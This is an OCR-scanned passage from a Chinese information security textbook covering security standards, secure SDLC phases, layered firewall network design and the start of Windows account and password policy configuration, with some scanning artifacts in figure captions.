保护 等 级 定 级 指南 》 (GB/T 22240 一 2008)， 等 级 保护 实施 类 : 《信息 系统 安全 等 级 保护 
实施 指南 》(GB/T 25508 一 2010)， 信 息 系 统 安全 建设 类 : 《信息 系统 通用 安全 技术 要 求 》 
(GB/T 20271—2006). 《信息 系 统 等 级 保护 安全 设计 技术 要 求 》(GB/T 25057 一 2010)、 
《信息 系统 安全 管理 要 求 》(GB/T 20269 一 2006)、《 信 息 系统 安全 工程 管理 要 求 》(GB/T 
20282 一 2006)、《 信 息 系 统 物理 安全 技术 要 求 》(GB/T 20270 一 2006) 等 ， 产品 类 : 操作 
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系统 类 : 《操作 系统 安全 技术 要 求 》(GB/T20272 一 2006)、《 操 作 系 统 安全 评估 准则 》 
(GB/T2008—2005), 数据 库 类 : 《数据 库 管 理 系统 安全 技术 要 求 》(GB/T 20273 一 2006)、 
《数据 库 管 理 系 统 安全 评估 准则 》(GB/T 20009 一 2005)， 网 络 类 : 《网 络 端 设备 隔离 部 件 
技术 要 求 》(GB/T 20279 一 2006)、《 网 络 端 设备 隔离 部 件 测试 评价 方法 》(GB/T 20277 
一 2006)、《 网 络 脆弱 性 扫描 产品 技术 要 求 》(GB/T 20278 一 2006)、《 网 络 脆弱 性 扫描 产 
品 测试 评价 方法 》(GB/T 20280 一 2006) 等 ，PKI 类 : (PKI 系统 安全 等 级 保护 技术 要 求 》 
(GB/T 21053 一 2007)， 服 务 器 类 : 《服务 器 安全 技术 要 求 》(GB/T 21028 一 2007) 等 。 

一 般 来 说 ， 规 模 较 大 的 组 织 也 会 按照 自身 需要 ， 制 定 相 关 的 信息 系统 安全 标准 。 一 
般 安全 标准 体系 也 包括 基础 安全 标准 、 环 境 与 平台 标准 、 信 息 安全 产品 标准 、 信 息 安全 
管理 标准 、 信 息 安全 测评 与 认证 标准 等 五 类 。 

在 以 上 的 标准 框架 的 基础 上 ， 开 发 人 员 在 设计 信息 系统 时 ， 需 要 遵循 相关 的 安全 标 
准 进 行 设计 和 规划 。 在 系统 构建 方面 ， 可 以 参考 安全 开发 生命 周期 的 方法 ， 对 整个 系统 
开发 的 过 程 做 出 全 面 的 安全 考虑 。 
7.2.2.2 ”信息 系统 安全 的 开发 构建 过 程 

根据 前 面 对 于 信息 系统 的 安全 进行 的 比较 详细 的 分 析 ， 下 面 将 综合 信息 系统 的 业务 
特点 和 具体 的 安全 实际 需求 ， 对 系统 进行 系统 模型 的 分 析 ， 从 而 为 不 同 部 分 设计 相应 的 
构建 原理 和 具体 的 安全 技术 。 本 书 采用 信息 系统 开发 生命 周期 (Information System 
Development Life Cycle，SDLC) 的 概念 ， 并 详细 介绍 信息 系统 开发 过 程 的 安全 考虑 。 

1. 开发 过 程 

目前 ， 国 外 广泛 采用 的 是 NIST SP800-64 标准 《信息 安全 开发 生命 周期 中 的 安全 考 
虑 指南 》。 该 《指南 》 介 绍 了 把 安全 纳入 信息 系统 开发 生命 周期 的 所 有 阶段 (从 初始 阶段 
到 最 终 处 理 阶段 ) 的 框架 。 引 用 NIST SP800-64 的 《指南 》 作 为 参考 ，SDLC 基本 上 号 
分 为 6 个 主要 阶段 ， 各 阶段 的 安全 措施 与 步骤 如 图 7-11 所 示 。 


Ed $ 。 需求 分 析 + 检查 与 验收 + 配置 管理 与 控制 


+ 安全 需求 分 类 ” 风险 评估 * 系统 集成 - 持续 性 监视 - 信息 处 理 
机 构 安全 目标 + 初步 风险 评估 机 安全 功能 需求 分 析 < 


+ 软 硬 件 处 理 


安全 需求 分 类 


"安全 测试 和 评估 


图 7-11 SDLC 的 6 个 主要 阶段 
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相 比 信息 系统 的 安全 问题 而 言 ， 实 施 和 部 署 系统 的 成 本 收益 问题 才 是 信息 系统 管理 
层 所 希望 关注 和 了 解 的 ， 并 且 也 是 容易 理解 的 问题 。 在 考虑 成 本 时 ， 针 对 的 对 象 包括 整 
体 过 程 和 具体 措施 两 部 分 。 整 体 过 程 具体 措施 可 以 细 化 为 每 一 项 安全 控制 或 者 安全 解决 
方案 ， 通 过 对 安全 控制 或 者 安全 解决 方案 进行 成 本 收益 分 析 。 

一 般 而 言 ， 管 理 人 员 和 安全 专家 将 一 起 采用 成 本 收益 分 析 方 法 ， 将 实施 和 部 署 新 系 
统 及 配套 的 其 他 培训 等 措施 所 需 的 投入 作为 成 本 ， 采 取 了 这 种 安全 措施 后 所 产生 的 对 信 
息 系统 业务 目标 的 支持 及 带 来 的 收益 和 减少 的 风险 损失 等 作为 收益 进行 综合 考虑 ， 以 实 
现 信息 系统 实施 的 业务 和 成 本 目标 。 由 于 对 人 员 的 安全 培训 是 贯穿 于 SDLC 始终 的 ， 因 
此 安全 培训 也 不 仅 限于 某 一 阶段 ， 也 不 能 完全 归 类 为 安全 控制 。 所 谓 的 目标 应 是 符合 成 
本 效益 的 保证 ， 以 满足 组 织 保护 其 信息 资产 的 需求 。 无 论处 于 何 种 情况 ， 在 从 系统 安全 
中 得 到 的 任务 性 能 的 收益 与 运行 系统 所 产生 的 风险 之 间 应 该 有 一 个 平衡 。 

除了 实施 和 部 署 系统 需要 考虑 成 本 平衡 问题 之 外 ， 在 SDLC 的 整个 过 程 中 也 需要 考 
虑 成 本 平衡 问题 。 整 个 SDLC 的 成 本 ,包括 实现 成 本 和 使 用 期 间 的 管理 成 本 ， 这 些 都 必 
须 考 虑 。 这 就 存在 一 个 平衡 ， 例 如 ， 采 购 阶段 增加 了 成 本 要 在 系统 运行 时 节约 成 本 。 在 
安全 方面 的 奉 代 架构 和 技术 也 应 该 子 以 考虑 。 

安全 开发 包括 两 部 分 内 容 ， 分 别 是 控制 开发 和 安全 编码 。 

安全 控制 是 为 了 应 对 风险 。 在 开发 安全 控制 中 选择 和 使 用 安全 技术 时 , 也 应 基于 “ 目 
标 一 策略 一 机 制 /手段 ”的 分 析 顺 序 ， 先 了 解 具体 的 安全 需求 和 目标 需求 所 应 对 的 风险 
然后 选择 应 对 风险 的 策略 ， 再 选择 适当 的 安全 控制 手段 ， 包 括 所 需 的 具体 安全 技术 。 应 
对 风险 的 策略 可 分 为 承受 风险 、 规 避风 险 、 转 移 风 险 和 限制 风险 4 种 。 当 选 定 了 具体 应 
对 风险 的 策略 后 ， 再 选择 适当 的 安全 控制 手段 ， 包 括 技术 性 、 操 作 性 和 管理 性 的 机 制 和 
手段 来 具体 实施 。 在 最 终 确 定 所 选择 的 安全 控制 手段 之 前 ， 还 需要 理解 每 一 种 控制 的 目 
标 、 应 用 领域 ， 以 及 所 需 的 配套 性 技术 性 控制 、 管 理性 措施 等 。 在 “设计 阶段 ”的 “ 安 
全 控制 开发 ”步骤 中 也 包括 了 “安全 解决 方案 ”的 确定 和 实施 。 在 确定 和 实施 “安全 解 
决 方案 ”时 ， 要 确保 构成 “安全 解决 方案 ”的 所 有 安全 控制 彼此 之 间 不 存在 严重 冲突 ， 
同时 也 要 进行 成 本 考虑 。 

当 安 全 规划 和 安全 控制 决定 之 后 ， 就 可 以 开始 具体 的 系统 安全 编码 工作 了 。 安 全 编 
码 是 开发 阶段 里 需要 主要 关注 的 环节 。 开 发 一 个 新 版 本 软件 的 过 程 需要 有 效 的 安全 控制 。 
安全 控制 必须 在 部 署 新 版 软件 之 前 进行 测试 和 评估 ,来 保证 控制 系统 正常 和 有 效 地 工作 。 
在 信息 系统 中 的 所 有 模块 都 必须 执行 并 遵守 安全 测试 的 内 容 ， 在 测试 结束 阶段 须 输 出 各 
模块 的 安全 测试 执行 报告 。 

实施 部 署 是 SDLC 的 第 4 阶段， 在 这 一 阶段 中 ， 信 息 系统 将 要 安装 在 操作 环境 中 并 
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对 它 进行 检查 评估 。 检 查 与 验收 是 指 信息 系统 方 对 信息 系统 安装 进行 检查 ， 然 后 对 验收 
并 交割 付款 这 一 过 程 做 出 决定 。 由 信息 系统 或 者 独立 的 审定 与 核查 的 第 二 方 来 做 检测 ， 
以 判断 这 一 系统 是 否 满足 规格 要 求 。 

检查 和 验收 的 主要 内 容 包括 系统 安装 和 系统 相关 文档 检查 。 这 一 阶段 是 在 系统 正式 
发 布 之 后 ， 由 信息 系统 或 者 可 信 第 三 方 来 检查 。 因 此 ， 系 统制 造 方 人 员 并 不 会 参与 本 阶 
段 的 检查 验收 工作 ， 但 需要 把 针对 检查 与 验收 的 检查 表 提 前 准备 好 ， 同 时 要 全 程 记 录 该 
阶段 的 情况 ， 最 终 输出 检查 与 验收 结果 报告 。 

系统 集成 在 将 要 部 署 信息 系统 的 业务 现场 出 现 。 集 成 和 验收 测试 在 系统 的 交付 和 安 
装 后 开始 。 系 统 集成 的 检查 人 员 包 括 信息 系统 或 可 信 第 三 方 人 员 ， 以 及 开发 方 人 员 。 

在 最 终 系统 部 署 之 前 ， 作 为 系统 开发 过 程 中 的 一 部 分 的 安全 认证 应 该 被 实施 ， 以 此 
来 确定 安全 控制 已 经 按照 安全 需求 建立 了 。 此 外 ， 在 信息 系统 中 ， 必 须 对 安全 控制 进行 
定期 测试 和 评估 ， 以 此 来 确认 这 些 安全 控制 实施 是 否 有 效 。 除 了 安全 控制 有 效 性 以 外 ， 
安全 认证 也 揭露 并 描述 了 信息 系统 真实 的 脆弱 程度 。 

安全 认证 将 由 信息 系统 或 者 可 信 第 三 方 的 安全 专家 进行 ， 主 要 包括 以 下 内 容 : 安全 
功能 需求 认证 、 安 全 保障 需求 认证 、 安 全 级 别 认证 。 这 一 阶段 是 在 产品 进行 系统 集成 之 
后 ， 由 客户 或 者 可 信 第 三 方 来 检查 的 。 因 此 ， 产 品 制造 方 人 员 并 不 会 参与 本 阶段 的 认证 
工作 ， 但 需要 把 针对 认证 的 检查 表 提 前 准备 好 ， 同 时 要 全 程 记录 该 阶段 的 情况 ， 最 终 和 输 
出 安全 认证 结果 报告 。 

安全 评审 是 在 产品 已 基本 完成 且 将 要 交付 给 信息 系统 方 时 ， 由 安全 评审 团队 进行 的 
从 安全 和 隐私 等 角度 进行 的 最 终 评估 审核 活动 。 该 环节 应 在 产品 开发 、 测 试 都 已 结束 后 
进行 ， 进 行 安 全 评审 后 的 系统 才能 正式 发 布 。 

安全 评审 团队 不 能 是 项 目 组 的 技术 人 员 和 管理 人 员 ， 应 该 由 信息 系统 的 安全 专家 和 
质量 监督 专家 组 成 。 安 全 评审 包括 以 下 内 容 : 安全 功能 需求 评审 、 安 全 保障 需求 评审 、 
威胁 模型 评审 、 未 修复 的 安全 bug 评审 、 残 余 风 险 评审 、 各 阶段 文档 评审 、 评 审 异 常 处 
理 。 本 步骤 将 输出 安全 评审 结果 报告 ， 报 告 将 包括 上 述 内 容 。 安 全 评审 结果 报告 将 作为 

品 是 否 能 正式 发 布 的 依据 之 一 。 

运行 维护 是 SDLC 的 第 5 阶段 。 在 这 一 阶段 ， 信 息 系 统 到 位 并 开始 运行 ， 对 这 个 已 
经 开发 或 者 测试 过 的 系统 进行 改进 或 者 修理 ， 以 及 对 硬件 或 软件 的 补充 或 更 换 。 当 修复 
或 者 更 改 被 确定 是 必需 时 ， 信 息 系统 也 许 会 重新 进入 SDLC 的 下 一 个 阶段 。 管 理 信息 系 
统 的 配置 、 进 行 持续 性 监视 ， 并 提供 安全 响应 是 在 这 一 阶段 里 的 关键 性 安全 步 又。 

配置 管理 与 控制 一 般 由 信息 系统 或 者 可 信 第 三 方 人 员 负 责 ， 信 息 系统 的 制造 方 人 员 
只 需 实时 提供 各 种 技术 支持 即 可 ， 因 此 ， 本 步骤 无 须 安全 相关 检查 项 目 。 


ao: 项 


KA 


信息 安全 工程 师 教程 


持续 性 监视 一 般 由 信息 系统 或 者 可 信 第 三 方 人 员 负 责 ， 信 息 系 统 的 制造 方 人 员 只 需 
实时 提供 各 种 技术 支持 即 可 ， 因 此 ， 本 步骤 无 须 安全 相关 检查 项 目 。 

安全 响应 是 指 ， 在 信息 系统 实际 运行 中 出 现 漏洞 时 ， 由 信息 系统 制造 方 人 员 及 时 提 
供 响应 等 技术 修复 和 改进 的 持续 性 活动 。 安 全 响应 主要 由 信息 系统 项 目的 开发 人 员 、 测 
试 人 员 、 专 门 的 客户 联络 代表 、 信 息 系 统 项 目 安全 专家 等 组 成 ， 主 要 包括 以 下 步骤 : ii 
洞 报告 、 漏 洞 分 析 及 处 理 、 补 丁 发 布 及 更 新 、 漏 洞 记录 及 追踪 。 每 进行 一 次 安全 响应 活 
动 都 必须 输出 漏洞 分 析 及 处 理 结果 报告 和 漏洞 记录 及 追踪 报告 。 

最 终 处 理 阶段 是 SDLC 的 最 后 一 个 阶段 ， 规 定 了 系统 的 处 理 。 信 息 系 统 方 一 般 会 选 
择 自己 的 工作 人 员 来 操作 和 维护 系统 。 通 常 ，SDLC 并 没有 一 个 最 终 的 结束 点 。 系 统 演 
变 或 者 转型 到 下 一 代 作为 需求 变更 或 者 技术 改进 的 一 个 结果 。 一 般 而 言 ， 系 统 的 所 有 者 
应 该 对 关键 信息 进行 存档 ， 对 存储 信息 的 媒介 进行 消毒 ， 然 后 再 处 理 软 人 硬件。 

信息 存储 一 般 由 信息 系统 自身 负责 ， 信 息 系 统制 造 方 人 员 只 需 实时 提供 各 种 技术 支 
持 即 可 。 信 息 处 理 一 般 由 信息 系统 自身 负责 ， 信 息 系统 制造 方 人 员 只 需 实时 提供 各 种 技 
术 支 持 即 可 。 硬 件 和 软件 可 以 按照 所 规定 的 适用 法 律 或 法 规 卖 掉 、 送 出 或 者 丢弃 。 软 件 
的 处 理应 该 遵守 许可 的 或 者 其 他 的 与 开发 商 所 达成 的 协议 ， 并 遵守 政府 法 规 。 

软件 处 理 时 ， 系 统 开 发 方 应 派出 专门 的 安全 专家 与 信息 系统 共同 处 理 ， 以 确保 信息 
系统 的 版 权 获得 有 效 保 护 。 本 步骤 主要 包括 以 下 内 容 : 软件 备份 检查 和 软件 代码 检查 。 
本 阶段 要 求 输出 软件 处 理 结果 报告 。 

2. 构建 模型 

前 面 简要 介绍 了 信息 系统 的 开发 过 程 。 但 由 于 信息 系统 这 一 业务 的 特殊 性 ， 使 其 在 
开发 时 还 需 针对 不 同 部 分 采取 不 同 的 安全 策略 和 设计 。 

一 般 的 信息 系统 的 实际 需求 包括 安全 、 方 便 、 易 操作 、 易 维护 和 控制 等 ， 信 息 系统 
也 不 例外 。 在 设计 信息 系统 这 类 大 型 分 布 式 系统 时 ， 通 常会 尽量 避免 过 度 使 用 基于 密码 
的 保护 措施 ， 因 为 使 用 密码 难免 导致 数据 处 理 速度 变 慢 ， 特 别 是 如 果 将 所 有 数据 都 进行 
加 密 ， 那 么 将 会 大 量 增加 在 内 容 分 析 、 负 载 均衡 以 及 系统 管理 等 方面 的 负担 。 因 此 ， 在 
进行 系统 的 安全 机 制 设 计时 ， 应 该 着 眼 于 整体 的 角度 来 考虑 安全 ， 而 不 仅仅 从 密码 的 角 
度 来 考虑 。 

然而 ， 一些 以 互联 网 作为 服务 渠道 的 信息 系统 不 可 避免 地 暴露 在 开放 的 网 络 环境 
中 ， 因 而 必须 面 对 开 放 环境 带 来 的 复杂 、 多 变 的 安全 威胁 。 要 解决 这 样 的 问题 ， 一 般 的 
做 法 是 将 信息 系统 分 成 两 部 分 ， 在 不 可 控 的 开放 环境 下 运作 的 部 分 (开放 式 系统 部 分 ); 
在 可 控 的 封闭 环境 下 运作 的 部 分 (封闭 式 系统 部 分 )。 由 于 开放 式 系统 部 分 必须 面 对 复 杂 、 
多 变 的 安全 威胁 ， 所 以 不 可 避免 地 需要 采用 基于 密码 的 安全 措施 来 达到 信息 系统 交易 安 
全 。 封 闭 式 系统 则 通过 有 效 的 物理 、 系 统 和 网 络 等 环境 控制 措施 来 保护 信息 系统 交易 数 
据 ， 从 而 避免 或 大 幅 减少 密码 的 使 用 。 这 两 部 分 采取 不 同 的 保护 方法 来 实现 相应 的 安全 
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策略 ， 以 此 来 满足 实际 的 安全 需求 。 以 数据 库 的 保护 为 例 , 如 果 对 数据 库 所 有 数据 加 密 ， 
则 会 导致 查询 速度 太 慢 ， 不 利于 数据 库 的 频繁 操作 。 因 此 ， 可 以 将 数据 库 放 在 可 控 的 封 
闭环 境 里 ， 在 保障 物理 环境 的 安全 的 前 提 下 ， 青 使 用 虚拟 专用 网 、 防 火 墙 等 网 络 安全 技 
术 来 保护 内 网 的 安全 ， 以 达到 封闭 环境 的 要 求 。 

3. 封闭 式 部 分 安全 的 设计 

封闭 式 系统 安全 实现 途径 的 特征 主要 有 两 点 : 一 是 由 多 个 防火 墙 的 组 合 来 创建 一 个 
封闭 的 系统 ; 二 是 使 用 入 侵 检测 系统 对 封闭 系统 进行 实时 的 威胁 监视 。 

其 中 ， 封 闭 系统 的 多 重 防火 墙 实现 的 主要 是 进行 数据 包 的 过 滤 。 如 果 外 来 数据 包 要 
访问 不 对 外 开放 的 服务 器 的 时 候 ， 就 需要 对 其 进行 过 滤 。 但 由 于 用 户 多 、 服 务 器 多 ， 设 
计 防 火 墙 的 过 滤 策 略 是 一 件 非常 困难 的 事情 。 而 且 随 着 时 间 的 增长 ， 用 户 、 服 务 器 数量 
继续 增加 ， 防 火 墙 的 过 滤 策 略 很 容易 出 错 ， 导 致 原来 安全 的 系统 也 会 变 得 不 安全 。 因 此 ， 
一 般 情 况 下 建议 每 6 个 月 对 系统 做 一 次 安全 测试 。 

防火 墙 相当 于 一 台 有 着 多 个 网 卡 的 计算 机 。 一 般 来 说 ， 信 息 系 统 必 须 部 署 防火 墙 把 
信息 系统 分 为 开放 部 分 与 封闭 部 分 。 数 据 包 从 Intemet 进入 外 网 ， 先 经 由 一 个 网 卡 做 策 
略 过 滤 ， 然 后 再 决定 是 否 让 该 数据 包 访问 进入 ;如 果 允 许 的 话 ， 通 过 另 一 个 网 卡 再 进入 
内 网 ， 否 则 就 将 该 数据 包 拦 截 。 

防火 墙 的 设计 思想 和 实现 方式 都 很 简单 ， 目 前 最 大 的 技术 难点 是 如 何 进行 数据 的 高 
速 过 滤 。 目 前 网 络 传输 速度 越 来 越 快 ， 经 常 要 进行 多 媒体 访问 ， 如 在 线 看 电影 等 ， 如 果 
过 滤 速 度 慢 ， 那 么 用 户 将 无 法 接受 这 样 的 视频 服务 质量 ， 特 别 是 如 果 集中 在 某 一 时 间 段 
视频 访问 人 数 多 的 话 ， 过 滤 技术 的 优化 问题 将 更 加 复杂 。 

在 封闭 式 安全 设计 中 ， 有 一 点 需要 注意 ， 就 是 区 分 安全 策略 和 机 制 是 两 个 有 差别 的 
概念 。 防 火 墙 属于 机 制 ， 策 略 是 指 防护 哪些 数据 ， 策 略 一 般 由 用 户 设 定 。 比 较 典型 的 方 
法 是 : 通过 网 络 结构 的 设计 简化 网 络 环境 ， 所 设计 的 策略 也 会 变 得 简单 。 防 火 墙 主要 是 
允许 外 面 的 数据 进入 ， 但 并 不 是 任何 数据 都 能 进来 ， 而 是 通过 过 滤 原 则 来 控制 外 来 的 
访问 。 

4. 开放 式 部 分 安全 的 设计 

开放 式 系统 的 绝对 安全 保护 很 难 实现 ， 因 为 安全 永远 是 有 代价 和 有 条 件 的 。 由 于 开 
放 环境 的 复杂 与 多 变 ， 即 使 使 用 已 知 最 强 的 密码 、 最 好 的 防火 墙 ， 也 不 能 保证 绝对 的 安 
全 ， 因 为 系统 的 不 安全 程度 是 由 其 最 弱 的 部 分 所 决定 的 。 只 要 某 一 部 分 存在 漏洞 ， 系 统 
就 容易 被 入 侵 者 从 这 个 地 方 攻破 。 

系统 最 容易 出 现 的 是 软件 漏洞 ， 这 往往 也 是 最 难 进行 检测 的 。 从 以 往 的 经 验 看 ， 攻 
击 者 一 般 都 不 会 花 时 间 去 解 破 密 码 、 攻 击 防火 墙 ， 而 是 找 软件 漏洞 (如 实现 访问 控制 的 
软件 漏洞 )。 软 件 漏洞 有 很 多 是 编程 者 为 了 方便 测试 而 留 下 的 后 门 ， 但 最 后 却 没有 删 掉 。 
系统 安全 很 重要 的 一 部 分 就 是 软件 安全 ， 因 此 ， 在 软件 开发 和 测试 过 程 中 需要 更 加 仔细 
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谨慎 。 

以 网 站 入 侵 为 例 ， 由 于 网 页 服务 器 受到 较 少 的 防火 墙 保护 ， 而 且 也 是 面向 公众 提供 
各 种 网 上 服务 ， 因 此 经 常 成 为 攻击 者 攻击 的 目标 。 大 部 分 用 于 攻击 网 站 的 攻击 工具 和 技 
术 都 利用 了 网 页 自身 及 操作 系统 的 软件 漏洞 ， 造 成 输入 无 效 、 缓 冲 区 溢出 、 盗 取 数 据 、 
网 站 界面 被 自 改 等 严重 后 果 。 

操作 系统 的 软件 漏洞 比较 明显 ， 以 微软 的 Windows 系统 为 例 ， 就 需要 不 断 地 下 载 补 
丁 以 弥补 各 种 安全 漏洞 和 隐患 。Windows 系统 不 安全 的 原因 之 一 是 由 于 Windows 用 户 数 
量 庞大 , 攻击 Windows 的 潜在 回报 非常 巨大 ， 因 此 容易 成 为 攻击 者 挑战 的 目标 而 不 断 地 
寻找 出 新 的 漏洞 。 

该 结构 利用 两 层 以 上 的 防火 墙 把 信息 系统 网 络 分 成 多 个 子 网 ， 网 络 显 示 多 层 结构 ， 
过 滤 策 略 就 会 简单 。 否 则 ， 当 信息 系统 所 有 服务 器 都 处 于 同一 个 网 络 中 时 ， 如 果 出 现 了 
安全 漏洞 ， 则 所 有 服务 器 都 会 有 危险 。 两 层 防火 墙 将 信息 系统 网 络 分 成 Intemet、 外 网 、 
内 网 3 层 结构 ,分 别 形成 了 用 户 端 、Web 服务 器 和 应 用 服务 器 3 个 系统 部 分 的 运行 环境 。 
这 不 仅 是 从 软件 设计 角度 考虑 ， 也 是 从 安全 角度 考虑 而 设计 的 结构 。 外 网 里 放 署 的 是 一 
些 提 供 公开 服务 的 不 敏感 的 服务 器 ， 如 邮件 服务 器 、 网 页 服务 器 ， 虽 然 还 是 要 对 其 进行 
保护 ， 但 即使 外 网 防火 墙 被 攻破 ， 也 不 会 使 存储 了 敏感 数据 的 服务 器 受到 损害 。 内 网 中 
放置 应 用 服务 器 ， 更 里 面 一 层 的 网 络 放 置 的 是 信息 系统 核心 服务 器 ， 称 为 主机 (Host 
System)， 一 般 使 用 专用 编码 、 专 用 网 络 协议 ， 核 心 数据 资料 都 存放 在 这 里 。 假 设 攻击 者 
先 从 信息 系统 网 站 进入 信息 系统 的 网 页 服务 器 ， 然 后 再 进入 信息 系统 的 应 用 服务 器 ， 则 
必须 要 通过 3 层 结构 。 攻 击 者 要 攻击 应 用 服务 器 甚至 访问 主机 的 话 ， 至 少 要 通过 两 个 防 
火 墙 才能 实现 ， 才 能 接触 到 敏感 数据 。 这 样 的 结构 使 每 个 防火 墙 的 安全 策略 设计 难度 降 
低 ， 而 攻击 难度 提高 。 
网 络 结构 简单 化 主要 是 为 了 防火 墙 的 过 滤 策 略 简单 化 。 过 滤 策 略 简单 化 ， 一 方面 提 
高 了 风险 防范 程度 ， 另 一 方面 也 使 安全 控制 容易 操作 。 通 过 这 些 方式 来 创造 一 个 可 控 的 
封闭 环境 ， 在 该 环境 中 避免 使 用 密码 ， 但 控制 却 容 易 操 作 。 

5. 安全 信息 系统 的 实现 

前 面 已 经 介绍 了 信息 系统 的 安全 设计 的 过 程 ， 通 过 分 析 可 以 看 到 ， 其 中 既 有 自身 的 
特性 ， 同 时 也 具有 一 般 信 息 系统 的 共性 。 下 面 就 其 中 的 共性 方面 进行 归纳 ， 得 出 一 些 安 
全 设计 可 以 应 用 在 其 他 一 般 意义 上 的 安全 信息 系统 的 实现 过 程 中 。 

设计 一 个 安全 的 分 布 式 系统 ， 需 要 对 系统 的 每 一 个 模块 实施 保护 ， 需 要 一 个 综合 全 
面 的 保护 手段 , 仅仅 采用 密码 、 防 火 墙 等 局 部 的 保护 措施 是 不 能 满足 要 求 的 。 一 般 来 说 ， 
需要 综合 应 用 密码 保护 、 网 络 安全 、 操 作 系统 保护 及 编程 语言 系统 保护 这 4 种 类 型 才能 
实现 整个 系统 的 安全 。 

同时 ， 要 实现 系统 的 安全 ， 也 不 能 仅 从 技术 角度 考虑 ， 而 是 需要 寻找 一 个 平衡 点 ， 
根据 要 保护 的 数据 信息 的 价值 来 决定 其 平衡 点 ， 这 个 平衡 包括 安全 、 速 度 和 成 本 等 多 方 


第 7 章 信息 系统 安全 工程 


面 的 均衡 。 因 此 ， 系 统 安全 是 全 局 的 综合 考虑 ， 要 熟悉 各 模块 之 间 的 关系 。 在 寻找 该 平 
衡 点 的 过 程 中 ， 先 要 看 要 保护 的 数据 的 价值 ， 以 及 所 运行 的 环境 的 开放 程度 。 如 果 运 行 
环境 比较 封闭 ， 可 以 少 用 加 密 技术 ， 成 本 会 相应 降低 ， 这 些 属 于 安全 风险 的 分 析 。 要 寻 
找 这 一 平衡 点 ， 要 从 以 下 3 个 方面 进行 综合 考虑 。 

@ 风险 分 析 。 需 要 在 计划 阶段 就 进行 ， 而 不 是 等 发 生 事故 之 后 再 进行 。 分 析 要 保 
护 的 数据 的 资产 ， 处 于 什么 样 的 环境 ， 会 面临 什么 样 的 攻击 。 有 一 些 数据 不 用 保密 ， 只 
需 确认 其 真实 性 、 完 整 性 。 先 找到 数据 的 资产 及 相关 的 威胁 ， 青 确定 其 安全 策略 ， 安 全 
机 制 才能 运行 。 

@ 安全 策略 。 基 于 风险 分 析 ， 要 满足 安全 对 象 和 相应 的 商业 、 操 作 需 求 及 监管 

@ 安全 架构 。 包 括 网 络 安全 、 系 统 安全 和 应 用 程序 安全 。 网 络 安全 和 系统 安全 主 
要 是 指 在 分 析 设计 时 采用 防火 墙 、 网 络 分 层 等 方式 ， 应 用 程序 安全 是 在 应 用 程序 编程 设 
计 上 的 安全 问题 ， 不 可 将 网 页 服务 器 当成 安全 防范 的 边界 和 终点 。 

在 设计 特定 企业 的 安全 信息 系统 的 时 候 需 要 考虑 行业 的 特殊 性 ， 一 般 可 以 从 以 下 6 
个 方面 来 考虑 企业 信息 系统 安全 。 

D 物理 安全 。 行 为 监测 和 物理 访问 控制 。 

© 网 络 安全 。 防 火 墙 、 VPN、 周 边 网 络 架构 。 

@ 主机 安全 。 权 限 监 控 、 入 侵 检测 、 反 病毒 软件 。 

D 数据 安全 。 加 密 、 数 字 签名 、 身 份 验证 。 

@ 独立 评估 。 定 期 进行 系统 安全 测试 。 

© 安全 应 急 机 制 。 内 部 沟通 与 外 部 通信 。 

考虑 以 上 几 个 方面 后 ， 就 需要 进行 整体 的 安全 分 析 设 计 过 程 ， 一 般 的 安全 分 析 设 计 
的 过 程 是 : 先进 行 基 于 风险 的 评估 , 分 析 以 后 再 根据 综合 环境 进行 管理 ,决定 安全 策略 ， 
再 设计 安全 系统 〈 包 括 网 络 安 全 和 系统 安全 、 应 用 逻辑 安全 )。 最 初 的 设计 过 程 结 束 后 ， 
还 要 进行 安全 测试 及 定期 检测 。 通 过 各 项 技术 一 层 一 层 地 实现 系统 安全 框架 ， 把 管理 做 
到 可 控 。 
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7.3.1 Windows 系统 安全 配置 
7.3.1.1 用 户 管理 配置 
1. 账号 管理 
进入 “控制 面板 一 用 户 账户 和 家 庭 安全 一 用 户 账户 ”打开 如 图 7-12 所 示 的 “Windows 
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账户 管理 ”窗口 。 


另 清 参阅 
@ 家 长 控制 


[| Administrator 
ai | 管理 员 
更 改 图 片 密码 保护 
@ 管理 其 他 帐户 


图 7-12 Windows 账户 管理 


O 根据 系统 的 要 求 ， 设 定 不 同 的 用 户 账户 和 密码 ， 如 管理 员 用 户 ， 数 据 库 用 户 ， 
审计 用 户 ， 来 宾 用 户 等 ;删除 或 锁定 与 设备 运行 、 维 护 等 与 工作 无 关 的 账号 。 
© 更 改 用 户 账户 控制 设置 ， 预 防 有 害 程 序 对 计算 机 进行 更 改 ， 如 图 7-13 所 示 。 


2. 账户 策略 


账户 策略 中 包括 密码 策略 和 账户 锁定 策略 两 种 安全 设置 。 密 码 策略 为 密码 复杂 程度 
和 密码 规则 的 修改 提供 了 一 种 标准 的 手段 ， 以 便 满足 高 安全 性 环境 中 对 密码 的 要 求 。 账 
户 锁定 策略 可 以 跟踪 失败 的 登录 ， 并 且 在 必要 时 可 以 锁定 相应 账户 。 

进入 “控制 面板 一 系统 和 安全 一 管理 工具 一 本 地 安全 策略 ”打开 本 地 安全 策略 窗 


口 ， 如 图 7-14 所 示 。 
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O FES, REREEEERS Windows 7 WEE 
序 时 ， 才 选择 此 选项 ， 因 为 这 些 程序 不 支持 用 户 帐户 


控制 ， 


图 7-13 Windows 用 户 账户 控制 设置 


Internet 协议 安全 性 (IPsec) 管理 ， 为 与 别 的 .… 
高 级 审核 策 政 配置 


7-14 Windows 本 地 安全 策略 
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(1) 密码 策略 

密码 策略 包含 6 种 与 密码 特征 相关 的 设置 ,分 别 是 “密码 必须 符合 复杂 性 要 求 ”“ 密 
码 长 度 最 小 值 ””“ 密 码 最 长 使 用 期 限 ”“ 密 码 最 短 使 用 期 限 ” “强制 密码 历史 ”和 “用 
可 还 原 的 加 密 来 储存 密码 ”。 

进入 “控制 面板 一 系统 和 安全 一 管理 工具 一 本 地 安全 策略 一 账户 策略 一 密码 策略 ”， 
如 图 7-15 所 示 。 通 过 双击 具体 策略 进行 设置 。 


B mereme E aim 
XEO BFA SEV EMH 


e> AM] Em 


图 7-15 Windows 密码 策略 


密码 必须 符合 复杂 性 要 求 : 启用 该 项 后 ， 将 对 所 有 的 新 密码 进行 检查 ， 确 保 满足 密 
码 复杂 性 的 基本 要 求 。 

如 果 启 用 此 策略 ， 密 码 必须 符合 下 列 最 低 要 求 : 不 能 包含 用 户 的 账户 名 ， 不 能 包含 
用 户 姓 名 中 超过 两 个 连续 字符 的 部 分 ， 至 少 有 六 个 字符 长 ， 包 含 以 下 四 类 字符 中 的 三 类 
